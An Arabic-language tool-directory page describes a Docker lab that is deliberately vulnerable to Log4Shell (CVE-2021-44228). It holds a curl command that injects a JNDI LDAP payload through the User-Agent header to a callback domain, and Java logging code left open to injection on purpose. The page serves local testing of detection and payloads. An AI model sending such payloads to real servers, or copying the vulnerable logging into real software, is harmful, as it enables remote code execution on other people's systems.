Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service — خدمة Spring Boot مُحسّنة على Docker ومُعرضة عمداً لثغرة Log4Shell (CVE-2021-44228) لاختبار أدوات الكشف والحمولات وقدرات الاستغلال في بيئة محلية. | Kitploit
أدوات/GitHubGitHub/zsolt-halo/log4j-log4shell-cve-2021-44228-spring-boot-test-service
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubzsolt-halo/log4j-log4shell-cve-2021-44228-spring-boot-test-service

Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service

خدمة Spring Boot مُحسّنة على Docker ومُعرضة عمداً لثغرة Log4Shell (CVE-2021-44228) لاختبار أدوات الكشف والحمولات وقدرات الاستغلال في بيئة محلية.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
132منذ 4 سنواتلم تتم المراجعة بعد

خدمة اختبار Spring Boot لـ CVE-2021-44228

هذا مشروع "Hello World" مخترق (dirty hack) باستخدام Spring Boot لاختبار أدواتك/حمولاتك/قدرات الكشف محليًا قبل استخدامها على الأهداف الإنتاجية.

إصدار Log4j المُهيأ هو 2.13.0

بناء صورة Docker

root@kitploit:~
bash build.sh

تشغيل صورة Docker

root@kitploit:~
docker run -p 8080:8080 dwdi/log4shell

اختبار / تشغيل CVE-2021-44228

إذا لم يكن لديك Burp Collaborator يعمل في المرآب، يمكنك زيارة هذا الموقع للحصول على تجربة مماثلة: https://interactsh.com

root@kitploit:~
curl -s --max-time 20 localhost:8080 -H 'User-Agent: ${jndi:ldap://<some_custom_identifier>.<your_generated_subdomain>.interactsh.com/a}' > /dev/null

أداة المسح (Scanner)

يمكنك استخدام هذا المستودع الرائع لإجراء المسح المحلي/الجماعي: https://github.com/adilsoybali/Log4j-RCE-Scanner

مواقع الحقن (Trigger locations)

تتلخص هذه الثغرة في إجبار قيمة يتحكم بها المستخدم على أن تُسجَّل بواسطة إطار التسجيل الضعيف. مع أخذ ذلك في الاعتبار، يدعم هذا التطبيق التجريبي البسيط اثنين من أوامر HTTP (GET/PUT) ومجموعة من مواقع الحقن:

root@kitploit:~
@GetMapping("/")
	public String index(HttpServletRequest request) {
		logger.info("Request URL: " + request.getRequestURL());
		logger.info("Request URI: " + request.getRequestURI());
		logger.info("Request Method: " + request.getMethod());
		logger.info("Request Query String: " + request.getQueryString());
		logger.info("Request Protocol: " + request.getProtocol());
		logger.info("Request Remote Address: " + request.getRemoteAddr());
		logger.info("Request Remote Host: " + request.getRemoteHost());
		logger.info("Request Remote Port: " + request.getRemotePort());
		logger.info("Request User Agent: " + request.getHeader("User-Agent"));
		return "Log4J2 is working!";
	}
root@kitploit:~
@PostMapping("/")
	public String post(HttpServletRequest request, @RequestBody String body) {
		logger.info("Request URL: " + request.getRequestURL());
		logger.info("Request URI: " + request.getRequestURI());
		logger.info("Request Method: " + request.getMethod());
		logger.info("Request Query String: " + request.getQueryString());
		logger.info("Request Protocol: " + request.getProtocol());
		logger.info("Request Remote Address: " + request.getRemoteAddr());
		logger.info("Request Remote Host: " + request.getRemoteHost());
		logger.info("Request Remote Port: " + request.getRemotePort());
		logger.info("Request User Agent: " + request.getHeader("User-Agent"));
		logger.info("Request Body: " + body); // mind the extra request body
		return "Log4J2 is working!";
	}

المساهمات / التحسينات مرحب بها.

نأسف لجودة الكود :) هذا المشروع ليس للتباهي بل للمشاركة / المساعدة.

تنزيل الأداة